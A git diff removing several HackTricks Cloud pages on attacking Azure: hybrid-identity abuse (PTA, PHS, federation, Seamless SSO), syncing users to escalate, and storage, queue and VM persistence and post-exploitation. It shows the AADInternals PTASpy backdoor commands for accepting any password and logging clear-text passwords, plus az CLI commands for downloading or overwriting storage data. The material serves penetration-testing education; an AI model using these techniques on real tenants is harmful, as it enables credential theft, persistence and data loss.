-{% endhint %} - -## Basic Information - -Integration between **On-premises Active Directory (AD)** and **Azure AD** is facilitated by **Azure AD Connect**, offering various methods that support **Single Sign-on (SSO)**. Each method, while useful, presents potential security vulnerabilities that could be exploited to compromise cloud or on-premises environments: - -* **Pass-Through Authentication (PTA)**: - * Possible compromise of the agent on the on-prem AD, allowing validation of user passwords for Azure connections (on-prem to Cloud). - * Feasibility of registering a new agent to validate authentications in a new location (Cloud to on-prem). - -{% content-ref url="pta-pass-through-authentication.md" %} -[pta-pass-through-authentication.md](pta-pass-through-authentication.md) -{% endcontent-ref %} - -* **Password Hash Sync (PHS)**: - * Potential extraction of clear-text passwords of privileged users from the AD, including credentials of a high-privileged, auto-generated AzureAD user. - -{% content-ref url="phs-password-hash-sync.md" %} -[phs-password-hash-sync.md](phs-password-hash-sync.md) -{% endcontent-ref %} - -* **Federation**: - * Theft of the private key used for SAML signing, enabling impersonation of on-prem and cloud identities. - -{% content-ref url="federation.md" %} -[federation.md](federation.md) -{% endcontent-ref %} - -* **Seamless SSO:** - * Theft of the `AZUREADSSOACC` user's password, used for signing Kerberos silver tickets, allowing impersonation of any cloud user. - -{% content-ref url="seamless-sso.md" %} -[seamless-sso.md](seamless-sso.md) -{% endcontent-ref %} - -* **Cloud Kerberos Trust**: - * Possibility of escalating from Global Admin to on-prem Domain Admin by manipulating AzureAD user usernames and SIDs and requesting TGTs from AzureAD. - -{% content-ref url="az-cloud-kerberos-trust.md" %} -[az-cloud-kerberos-trust.md](az-cloud-kerberos-trust.md) -{% endcontent-ref %} - -* **Default Applications**: - * Compromising an Application Administrator account or the on-premise Sync Account allows modification of directory settings, group memberships, user accounts, SharePoint sites, and OneDrive files. - -{% content-ref url="az-default-applications.md" %} -[az-default-applications.md](az-default-applications.md) -{% endcontent-ref %} - -For each integration method, user synchronization is conducted, and an `MSOL_` account is created in the on-prem AD. Notably, both **PHS** and **PTA** methods facilitate **Seamless SSO**, enabling automatic sign-in for Azure AD computers joined to the on-prem domain. - -To verify the installation of **Azure AD Connect**, the following PowerShell command, utilizing the **AzureADConnectHealthSync** module (installed by default with Azure AD Connect), can be used: - -```powershell -Get-ADSyncConnector -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md deleted file mode 100644 index 357b0f863..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md +++ /dev/null @@ -1,35 +0,0 @@ -# Az - Default Applications - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -**Check the techinque in:** [**https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/**](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/)**,** [**https://www.youtube.com/watch?v=JEIR5oGCwdg**](https://www.youtube.com/watch?v=JEIR5oGCwdg) and [**https://www.youtube.com/watch?v=xei8lAPitX8**](https://www.youtube.com/watch?v=xei8lAPitX8) - -The blog post discusses a privilege escalation vulnerability in Azure AD, allowing Application Admins or compromised On-Premise Sync Accounts to escalate privileges by assigning credentials to applications. The vulnerability, stemming from the "by-design" behavior of Azure AD's handling of applications and service principals, notably affects default Office 365 applications. Although reported, the issue is not considered a vulnerability by Microsoft due to documentation of the admin rights assignment behavior. The post provides detailed technical insights and advises regular reviews of service principal credentials in Azure AD environments. For more detailed information, you can visit the original blog post. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md deleted file mode 100644 index d2c2f4287..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md +++ /dev/null @@ -1,61 +0,0 @@ -# Az- Synchronising New Users - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Syncing AzureAD users to on-prem to escalate from on-prem to AzureAD - -I order to synchronize a new user f**rom AzureAD to the on-prem AD** these are the requirements: - -* The **AzureAD user** needs to have a proxy address (a **mailbox**) -* License is not required -* Should **not be already synced** - -{% code overflow="wrap" %} -```powershell -Get-MsolUser -SerachString admintest | select displayname, lastdirsynctime, proxyaddresses, lastpasswordchangetimestamp | fl -``` -{% endcode %} - -When a user like these is found in AzureAD, in order to **access it from the on-prem AD** you just need to **create a new account** with the **proxyAddress** the SMTP email. - -An automatically, this user will be **synced from AzureAD to the on-prem AD user**. - -{% hint style="danger" %} -Notice that to perform this attack you **don't need Domain Admin**, you just need permissions to **create new users**. - -Also, this **won't bypass MFA**. - -Moreover, this was reported an **account sync is no longer possible for admin accounts**. -{% endhint %} - -## References - -* [https://www.youtube.com/watch?v=JEIR5oGCwdg](https://www.youtube.com/watch?v=JEIR5oGCwdg) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md deleted file mode 100644 index d84673358..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md +++ /dev/null @@ -1,100 +0,0 @@ -# Az - PTA - Pass-through Authentication - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-pta) Azure Active Directory (Azure AD) Pass-through Authentication allows your users to **sign in to both on-premises and cloud-based applications using the same passwords**. This feature provides your users a better experience - one less password to remember, and reduces IT helpdesk costs because your users are less likely to forget how to sign in. When users sign in using Azure AD, this feature **validates users' passwords directly against your on-premises Active Directory**. - -In PTA **identities** are **synchronized** but **passwords** **aren't** like in PHS. - -The authentication is validated in the on-prem AD and the communication with cloud is done by an **authentication agent** running in an **on-prem server** (it does't need to be on the on-prem DC). - -### Authentication flow - -
- -1. To **login** the user is redirected to **Azure AD**, where he sends the **username** and **password** -2. The **credentials** are **encrypted** and set in a **queue** in Azure AD -3. The **on-prem authentication agent** gathers the **credentials** from the queue and **decrypts** them. This agent is called **"Pass-through authentication agent"** or **PTA agent.** -4. The **agent** **validates** the creds against the **on-prem AD** and sends the **response** **back** to Azure AD which, if the response is positive, **completes the login** of the user. - -{% hint style="warning" %} -If an attacker **compromises** the **PTA** he can **see** the all **credentials** from the queue (in **clear-text**).\ -He can also **validate any credentials** to the AzureAD (similar attack to Skeleton key). -{% endhint %} - -### On-Prem -> cloud - -If you have **admin** access to the **Azure AD Connect server** with the **PTA** **agent** running, you can use the **AADInternals** module to **insert a backdoor** that will **validate ALL the passwords** introduced (so all passwords will be valid for authentication): - -```powershell -Install-AADIntPTASpy -``` - -{% hint style="info" %} -If the **installation fails**, this is probably due to missing [Microsoft Visual C++ 2015 Redistributables](https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe). -{% endhint %} - -It's also possible to **see the clear-text passwords sent to PTA agent** using the following cmdlet on the machine where the previous backdoor was installed: - -```powershell -Get-AADIntPTASpyLog -DecodePasswords -``` - -This backdoor will: - -* Create a hidden folder `C:\PTASpy` -* Copy a `PTASpy.dll` to `C:\PTASpy` -* Injects `PTASpy.dll` to `AzureADConnectAuthenticationAgentService` process - -{% hint style="info" %} -When the AzureADConnectAuthenticationAgent service is restarted, PTASpy is “unloaded” and must be re-installed. -{% endhint %} - -### Cloud -> On-Prem - -{% hint style="danger" %} -After getting **GA privileges** on the cloud, it's possible to **register a new PTA agent** by setting it on an **attacker controlled machine**. Once the agent is **setup**, we can **repeat** the **previous** steps to **authenticate using any password** and also, **get the passwords in clear-text.** -{% endhint %} - -### Seamless SSO - -It's possible to use Seamless SSO with PTA, which is vulnerable to other abuses. Check it in: - -{% content-ref url="seamless-sso.md" %} -[seamless-sso.md](seamless-sso.md) -{% endcontent-ref %} - -## References - -* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta) -* [https://aadinternals.com/post/on-prem\_admin/#pass-through-authentication](https://aadinternals.com/post/on-prem_admin/#pass-through-authentication) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md b/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md deleted file mode 100644 index d8149527a..000000000 --- a/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md +++ /dev/null @@ -1,33 +0,0 @@ -# Az - Permissions for a Pentest - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md b/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md deleted file mode 100644 index e7c185893..000000000 --- a/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md +++ /dev/null @@ -1,59 +0,0 @@ -# Az - Queue Storage Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Queue - -For more information check: - -{% content-ref url="../az-services/az-queue-enum.md" %} -[az-queue-enum.md](../az-services/az-queue-enum.md) -{% endcontent-ref %} - -### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write` - -This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks. - -{% code overflow="wrap" %} -```bash -az storage queue create --name --account-name - -az storage queue metadata update --name --metadata key1=value1 key2=value2 --account-name - -az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name -``` -{% endcode %} - -## References - -* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues -* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api -* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md b/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md deleted file mode 100644 index 196d5ebf4..000000000 --- a/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md +++ /dev/null @@ -1,72 +0,0 @@ -# Az - Storage Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Storage Privesc - -For more information about storage check: - -{% content-ref url="../az-services/az-storage.md" %} -[az-storage.md](../az-services/az-storage.md) -{% endcontent-ref %} - -### Common tricks - -* Keep the access keys -* Generate SAS - * User delegated are 7 days max - -### Microsoft.Storage/storageAccounts/blobServices/containers/update && Microsoft.Storage/storageAccounts/blobServices/deletePolicy/write - -These permissions allows the user to modify blob service properties for the container delete retention feature, which enables or configures the retention period for deleted containers. These permissions can be used for maintaining persistence to provide a window of opportunity for the attacker to recover or manipulate deleted containers that should have been permanently removed and accessing sensitive information. - -{% code overflow="wrap" %} -```bash -az storage account blob-service-properties update \ - --account-name \ - --enable-container-delete-retention true \ - --container-delete-retention-days 100 -``` -{% endcode %} - -### Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action - -These permissions can lead to the attacker to modify the retention policies, restoring deleted data, and accessing sensitive information. - -{% code overflow="wrap" %} -```bash -az storage blob service-properties delete-policy update \ - --account-name \ - --enable true \ - --days-retained 100 -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - diff --git a/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md b/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md deleted file mode 100644 index 5f67c2b12..000000000 --- a/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md +++ /dev/null @@ -1,51 +0,0 @@ -# Az - VMs Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## VMs persistence - -For more information about VMs check: - -{% content-ref url="../az-services/vms/" %} -[vms](../az-services/vms/) -{% endcontent-ref %} - -### Backdoor VM applications, VM Extensions & Images - -An attacker identifies applications, extensions or images being frequently used in the Azure account, he could insert his code in VM applications and extensions so every time they get installed the backdoor is executed. - -### Backdoor Instances - -An attacker could get access to the instances and backdoor them: - -* Using a traditional **rootkit** for example -* Adding a new **public SSH key** (check [EC2 privesc options](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc)) -* Backdooring the **User Data** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md deleted file mode 100644 index d63a1375f..000000000 --- a/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md +++ /dev/null @@ -1,71 +0,0 @@ -# Az - Blob Storage Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Storage Privesc - -For more information about storage check: - -{% content-ref url="../az-services/az-storage.md" %} -[az-storage.md](../az-services/az-storage.md) -{% endcontent-ref %} - -### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read - -A principal with this permission will be able to **list** the blobs (files) inside a container and **download** the files which might contain **sensitive information**. - -```bash -# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read -az storage blob list \ - --account-name \ - --container-name --auth-mode login - -az storage blob download \ - --account-name \ - --container-name \ - -n file.txt --auth-mode login -``` - -### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write - -A principal with this permission will be able to **write and overwrite files in containers** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a blob): - -```bash -# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write -az storage blob upload \ - --account-name \ - --container-name \ - --file /tmp/up.txt --auth-mode login --overwrite -``` - -### \*/delete - -This would allow to delete objects inside the storage account which might **interrupt some services** or make the client **lose valuable information**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md deleted file mode 100644 index 648443c17..000000000 --- a/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md +++ /dev/null @@ -1,74 +0,0 @@ -# Az - File Share Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## File Share Post Exploitation - -For more information about file shares check: - -{% content-ref url="../az-services/az-file-shares.md" %} -[az-file-shares.md](../az-services/az-file-shares.md) -{% endcontent-ref %} - -### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/read - -A principal with this permission will be able to **list** the files inside a file share and **download** the files which might contain **sensitive information**. - -```bash -# List files inside an azure file share -az storage file list \ - --account-name \ - --share-name \ - --auth-mode login --enable-file-backup-request-intent - -# Download an specific file -az storage file download \ - --account-name \ - --share-name \ - --path \ - --dest /path/to/down \ - --auth-mode login --enable-file-backup-request-intent -``` - -### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write, Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action - -A principal with this permission will be able to **write and overwrite files in file shares** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a file share): - -```bash -az storage blob upload \ - --account-name \ - --container-name \ - --file /tmp/up.txt --auth-mode login --overwrite -``` - -### \*/delete - -This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
